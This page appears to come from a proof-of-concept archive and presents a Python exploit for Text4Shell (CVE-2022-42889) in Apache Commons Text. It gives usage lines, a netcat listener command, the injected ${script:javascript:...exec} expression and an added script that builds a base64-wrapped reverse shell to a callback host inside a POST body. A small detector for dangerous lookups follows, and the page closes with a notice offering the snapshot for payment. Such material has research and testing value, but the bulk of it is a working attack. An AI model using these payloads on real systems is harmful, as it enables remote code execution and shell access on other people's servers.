Related vulnerability
Description
A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions 1.5 through 1.9 (fixed in 1.10.0).
Introduction
# text4shell-exploit
A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions 1.5 through 1.9 (fixed in 1.10.0).
This exploit targets vulnerable Java applications that pass untrusted input to a `StringSubstitutor` built with the default interpolator, which allows injection of `${script:...}` expressions that execute arbitrary system commands.
In this PoC, exploitation is demonstrated via a request parameter named `data`; the vulnerable parameter name and request path vary between applications. Adapt the payload and request path to the target application's logic.
**Disclaimer**: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.
## Description
This is a custom Python3 exploit for the Apache Commons Text vulnerability known as **Text4Shell** (CVE-2022-42889). It achieves Remote Code Execution (RCE) through the insecure `script`, `dns` and `url` interpolators that `StringSubstitutor` enabled by default before 1.10.0, whenever user input is dynamically evaluated.
Tested against:
- Apache Commons Text 1.5 through 1.9 (< 1.10.0)
- Java applications that feed untrusted input to `StringSubstitutor.createInterpolator()`, so that `${script:...}` expressions are evaluated
## Usage
```bash
python3 text4shell.py <target_ip> <callback_ip> <callback_port>
```
## Example
```bash
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
```
## Listener
Before running the exploit, start a listener on your attacking machine on the chosen callback port:
```bash
nc -nlvp 4444
```
## Payload Logic
The script injects:
```text
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
```
The reverse-shell command is placed in the `data` parameter of a POST request. Note that the `script:javascript` lookup only works when the target JVM provides a JSR-223 JavaScript engine (Nashorn, shipped with JDK 8 through 14 and removed in JDK 15); on newer JDKs without an added engine the `script` lookup fails even though the library is vulnerable, and the `dns` and `url` lookups are the remaining confirmation vectors.
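As an added example (not the repository's `text4shell.py`, whose exact command string the page does not show), the following Python builds the `${script:javascript:...}` expression described above and pairs it with the check a defender would run over a captured POST body. The reverse-shell wrapper, the parameter name `data` and the sample bodies are assumptions made for the demonstration.

```python
"""Build and detect Text4Shell (CVE-2022-42889) lookup payloads.

Added example, not the PoC's own code. The `data` parameter name, the
shell wrapper and the sample request bodies are assumptions.
"""
import base64
import re
from urllib.parse import parse_qs, urlencode

# Lookups enabled by default in Commons Text 1.5-1.9 and removed from the
# default interpolator in 1.10.0, the fix for CVE-2022-42889.
DANGEROUS_LOOKUPS = ("script", "dns", "url")

# Matches ${script:...}, ${dns:...} and ${url:...} in decoded text.
_LOOKUP_RE = re.compile(r"\$\{\s*(script|dns|url)\s*:", re.IGNORECASE)


def shell_wrap(command: str) -> str:
    """Wrap a shell command so java.lang.Runtime.exec(String) runs it intact.

    exec(String) splits on whitespace and knows no shell syntax, so pipes and
    redirections in a reverse shell would be passed as literal arguments.
    The command is therefore base64-encoded and decoded by bash on the target.
    """
    b64 = base64.b64encode(command.encode()).decode()
    return f"bash -c {{echo,{b64}}}|{{base64,-d}}|{{bash,-i}}"


def script_payload(command: str) -> str:
    """Return the ${script:javascript:...} expression the exploit injects."""
    escaped = command.replace("\\", "\\\\").replace('"', '\\"')
    return (
        "${script:javascript:java.lang.Runtime.getRuntime()"
        '.exec("%s")}' % escaped
    )


def request_body(payload: str, parameter: str = "data") -> str:
    """URL-encode the payload as the form body of the POST request."""
    return urlencode({parameter: payload})


def find_dangerous_lookups(form_body: str) -> list:
    """Return the dangerous lookup prefixes found in a URL-encoded POST body.

    Decoding happens before matching, so the check also catches bodies in
    which `$`, `{` and `:` arrive percent-encoded.
    """
    found = []
    for values in parse_qs(form_body, keep_blank_values=True).values():
        for value in values:
            for hit in _LOOKUP_RE.findall(value):
                name = hit.lower()
                if name not in found:
                    found.append(name)
    return found


if __name__ == "__main__":
    # Assumed callback address; replace with the attacking host.
    payload = script_payload(shell_wrap("bash -i >& /dev/tcp/192.168.1.2/4444 0>&1"))
    body = request_body(payload)
    print("POST body:", body)

    # Constructed sample bodies: one benign Commons Text lookup, one attack.
    samples = ["data=%24%7Bdate%3Ayyyy-MM-dd%7D", body]
    for sample in samples:
        print(find_dangerous_lookups(sample) or "clean", "<-", sample[:60])
```

The detector lowercases the matched prefix and deduplicates, so a body carrying several lookups yields each name once; it deliberately matches case-insensitively rather than relying on how the target normalises prefixes.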
File snapshot
[4.0K] /data/pocs/027ed40a4f2a44216e3ad5389243906afb1d37cf
├── [1.0K] LICENSE
├── [1.6K] README.md
└── [1.2K] text4shell.py
0 directories, 3 files
Notes
1. Accessing the PoC through its original source is recommended.
2. If the source has gone offline or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.